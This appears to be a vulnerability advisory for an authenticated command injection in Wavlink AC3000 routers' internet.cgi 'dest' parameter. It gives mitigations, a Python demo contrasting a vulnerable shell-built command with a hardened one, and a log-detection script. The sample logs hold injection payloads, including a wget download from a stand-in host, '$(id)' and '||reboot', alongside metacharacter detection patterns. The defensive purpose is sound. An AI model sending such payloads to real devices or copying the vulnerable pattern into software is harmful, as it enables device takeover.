CVE-2024-39764

9.1 CRITICAL

📋 TL;DR

CVE-2024-39764 is one of several OS command injection vulnerabilities in the set_add_routing() functionality of internet.cgi on Wavlink AC3000 routers. This entry is the one reached through the 'dest' POST parameter: its value is placed into an operating-system command without validation, so an authenticated attacker who sends a specially crafted HTTP request can execute arbitrary commands on the device. Every organization and individual running an affected AC3000 is exposed, with the router's administrative credentials as the only barrier.

💻 Affected Systems

Products:
  • Wavlink AC3000 M33A8
Versions: V5030.210505 (confirmed affected; earlier releases were not tested and should be assumed vulnerable)
Operating Systems: Embedded Linux (the web interface is a set of CGI programs)
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires a valid session on the web administration interface, so unchanged default credentials, weak passwords, or credentials reused from other devices turn this into a practical remote attack.

📦 What is this software?

The Wavlink AC3000 (model M33A8) is a consumer wireless router. Its administrative web interface is implemented as CGI programs; internet.cgi handles WAN and routing settings, and its set_add_routing() handler turns a submitted static route into an operating-system command. That is the path by which the unvalidated 'dest' parameter reaches a shell.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the router: the attacker establishes persistent access, pivots into the internal network, intercepts or redirects traffic, or enrolls the device in a botnet.

🟠 Likely Case

An attacker holding administrative credentials gains command execution on the router and uses it to alter configuration (DNS, routes, port forwards), intercept network traffic, or push malicious content to connected devices.

🟢 If Mitigated

Limited impact where the administrative interface is reachable only from a management network, credentials are strong and unique, and access to the interface is logged and monitored.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation needs a valid administrative session, but once one is held the attack is a single crafted POST to internet.cgi carrying shell syntax in the 'dest' parameter; the injected command runs with the privileges of the web-server process, which on consumer routers is typically root. Default passwords, credential reuse, or phishing are the realistic route to the required session.
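As an added illustration of why one POST parameter turns into a shell command, the following Python stand-in shows the vulnerable construction beside the hardened one. It is not code from the Wavlink firmware or from any advisory (the real set_add_routing() is a native CGI handler whose source is not public); `echo` replaces `route` so it runs harmlessly, and the parameter name gw and the POST body layout are assumptions.

```python
"""Illustration of the bug class behind CVE-2024-39764, added for this page.
It is not the Wavlink firmware's code (set_add_routing() is a native CGI
handler whose source is not public). A stand-in handler builds a `route add`
command from the 'dest' POST parameter; `echo` replaces `route` so the
example runs harmlessly on any POSIX host. The 'gw' parameter name and the
POST body layout are assumptions."""
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Constructed POST bodies as they would arrive on the wire (percent-encoded).
BENIGN_BODY = "dest=10.20.0.0%2F16&gw=192.168.1.1"
INJECTED_BODY = "dest=10.20.0.0%2F16%3Becho+INJECTED&gw=192.168.1.1"


def post_params(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (first value per key).
    Decoding happens before the value reaches any command, which is why
    %3B on the wire becomes a live ';' inside the handler."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_add_route(body: str) -> str:
    """Vulnerable pattern: the decoded parameter is pasted into a shell
    command line, so ';', '|', '&&', '$(...)' in dest are interpreted by sh."""
    p = post_params(body)
    cmd = f"echo route add -net {p['dest']} gw {p['gw']}"   # echo stands in for route
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def valid_dest(dest: str) -> bool:
    """Allowlist check: dest must parse as an IPv4/IPv6 address or network.
    Anything carrying shell syntax fails to parse and is rejected."""
    try:
        ipaddress.ip_network(dest, strict=False)
    except ValueError:
        return False
    return True


def hardened_add_route(body: str) -> str:
    """Hardened pattern: validate against an allowlist, then execute without
    a shell so the value is one argv element whatever characters it holds."""
    p = post_params(body)
    dest, gw = p["dest"], p["gw"]
    if not valid_dest(dest):
        raise ValueError(f"rejected dest parameter: {dest!r}")
    ipaddress.ip_address(gw)                                  # raises ValueError on garbage
    argv = ["echo", "route", "add", "-net", dest, "gw", gw]   # no shell involved
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(vulnerable_add_route(BENIGN_BODY), end="")
    print(vulnerable_add_route(INJECTED_BODY), end="")   # second line is the injected command's output
    try:
        hardened_add_route(INJECTED_BODY)
    except ValueError as exc:
        print("hardened handler:", exc)
```

Running it prints the benign route command once, then for the injected body two lines, the second being the output of the smuggled `echo INJECTED`; the hardened handler rejects the same body before anything executes. Both layers matter: the allowlist stops the malformed value, and the argv-based exec means that even a value the allowlist missed would be a single literal argument rather than shell syntax.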

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: Yes

Instructions:

1. Check the Wavlink support site for an AC3000 (M33A8) firmware release whose notes reference CVE-2024-39764; no fixed version is listed here, so a newer build is not automatically a fixed one.
2. Download the firmware image only from the vendor's site and record its checksum.
3. Log in to the router admin interface from a trusted host.
4. Navigate to the firmware update section.
5. Upload and apply the new firmware.
6. Reboot the router after the update and confirm the reported firmware version has changed.

🔧 Temporary Workarounds

Restrict Administrative Access (linux)

Limit access to the router admin interface to trusted IP addresses only. These rules apply wherever you can run iptables in front of the interface: on the router itself if it offers a shell, or on an upstream firewall that fronts the management address. On a stock AC3000 with no shell, disable remote (WAN-side) management in the admin UI instead. Insert the rules at the top of the chain so they take precedence over any existing blanket ACCEPT:

# Insert the drops first, then insert the allow rules above them.
iptables -I INPUT 1 -p tcp --dport 80 -j DROP
iptables -I INPUT 1 -p tcp --dport 443 -j DROP
iptables -I INPUT 1 -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -I INPUT 1 -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT

Change Default Credentials (all)

Set a strong, unique administrative password and rotate it after any suspected exposure. Because the injection is only reachable with a valid session, the admin credential is the single control between an attacker and arbitrary command execution on the device.

🧯 If You Can't Patch

  • Disable remote (WAN-side) management of the web interface and keep HTTP/HTTPS closed on the WAN port
  • Segment the router's management interface on a dedicated VLAN with strict firewall rules
  • Monitor HTTP requests to the router admin interface for shell syntax in POST parameters, and alert on logins from hosts that do not normally manage the device

🔍 How to Verify

Check if Vulnerable:

Read the firmware version from the admin interface (or its status page). If the version is V5030.210505 or earlier, treat the device as vulnerable.

Check Version:

curl -s -b 'NAME=VALUE' http://router-ip/status.cgi | grep firmware_version

The status.cgi path and the firmware_version field are illustrative; confirm the actual status endpoint and field name for your firmware build, and supply the admin session cookie (here via -b) because the page requires an authenticated session.

Verify Fix Applied:

Confirm the firmware version matches a release the vendor identifies as fixing CVE-2024-39764. No fixed version is published here, so a version merely later than V5030.210505 is not by itself proof of a fix.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to internet.cgi whose parameters contain shell metacharacters (; | && $( `) or their percent-encoded forms (%3B %7C %26%26 %24%28 %60); a legitimate 'dest' value is only an address with an optional prefix length
  • Multiple failed authentication attempts followed by a successful login, especially from a host that has not managed the router before
  • Most consumer router logs do not record request bodies; capture them at a reverse proxy, NIDS, or span port in front of the management interface

Network Indicators:

  • HTTP POST bodies to the router carrying shell commands, decoded before matching because the metacharacters are normally percent-encoded on the wire
  • Outbound connections from the router itself to unexpected external IPs (second-stage download, command and control)

SIEM Query:

source="router_logs" AND url="*internet.cgi*" AND (param="*dest=*;*" OR param="*dest=*|*" OR param="*dest=*&&*" OR param="*dest=*$(*" OR param="*dest=*%3B*" OR param="*dest=*%7C*" OR param="*dest=*%26%26*" OR param="*dest=*%24%28*")

Do not match on a single "&" after dest=: it is the form-field separator and would fire on every multi-parameter request. Prefer the percent-encoded patterns if your log source stores bodies as received, or decode the field first and then apply a positive check that dest is nothing but an address and prefix length.
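The indicators above, as an added detection example written for this page rather than vendor- or SIEM-supplied content. It assumes an access log that records the request path and the percent-encoded POST body (most routers do not, so capture at a proxy or NIDS), decodes the 'dest' value, and flags it on two independent checks: presence of shell metacharacters and failure of an address-only allowlist. The log lines are constructed samples in that assumed layout.

```python
"""Detection logic for the indicators above, added for this page; it is not
vendor or SIEM-supplied content. It assumes an access log that records the
request path and the POST body, which most routers do not do by default
(capture at a reverse proxy or NIDS in front of the admin interface). The
log lines are constructed samples in that assumed layout:
  <client> <method> <path> <status> [<percent-encoded body>]"""
import re
from urllib.parse import parse_qs

SAMPLE_LOG = """\
192.168.1.20 POST /internet.cgi 200 dest=10.20.0.0%2F16&gw=192.168.1.1
192.168.1.20 POST /internet.cgi 200 dest=10.20.0.0%2F16%3Bwget+http%3A%2F%2F203.0.113.9%2Fx&gw=192.168.1.1
192.168.1.33 POST /internet.cgi 200 dest=%24%28id%29&gw=192.168.1.1
192.168.1.20 GET /internet.cgi 200
192.168.1.44 POST /internet.cgi 200 dest=10.20.0.0%2F16%7C%7Creboot&gw=192.168.1.1
"""

LINE_RE = re.compile(
    r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})(?: (?P<body>\S+))?$"
)
# Shell syntax that has no place in a destination address or network. The
# check runs on the decoded value, so a lone '&' here means %26 on the wire,
# not the form-field separator.
META_RE = re.compile(r"[;|&`$()<>\n]")
# Allowlist: an IPv4/IPv6 literal with an optional prefix length.
DEST_OK_RE = re.compile(r"[0-9A-Fa-f.:]+(?:/\d{1,3})?")


def inspect(line: str):
    """Return a finding dict for a suspicious internet.cgi request, else None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or not m["path"].endswith("internet.cgi") or not m["body"]:
        return None
    params = parse_qs(m["body"], keep_blank_values=True)   # percent-decodes values
    dest = params.get("dest", [None])[0]
    if dest is None:
        return None
    reasons = []
    if META_RE.search(dest):
        reasons.append("shell metacharacter")
    if not DEST_OK_RE.fullmatch(dest):
        reasons.append("not an address/network")
    if not reasons:
        return None
    return {"src": m["src"], "dest": dest, "reasons": reasons}


def scan(log: str) -> list:
    """Run inspect() over every line and keep the findings."""
    return [hit for hit in map(inspect, log.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']}: dest={hit['dest']!r} ({', '.join(hit['reasons'])})")
```

Against the samples this reports three of the four POSTs (the `;wget`, `$(id)` and `||reboot` payloads) and ignores the benign route and the GET. The allowlist check is the one worth keeping even if the metacharacter list drifts: a routing destination that is not an address and prefix length is suspicious regardless of which shell construct was used. To run it on real data, adapt LINE_RE to your log layout and keep the decode-then-match order.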
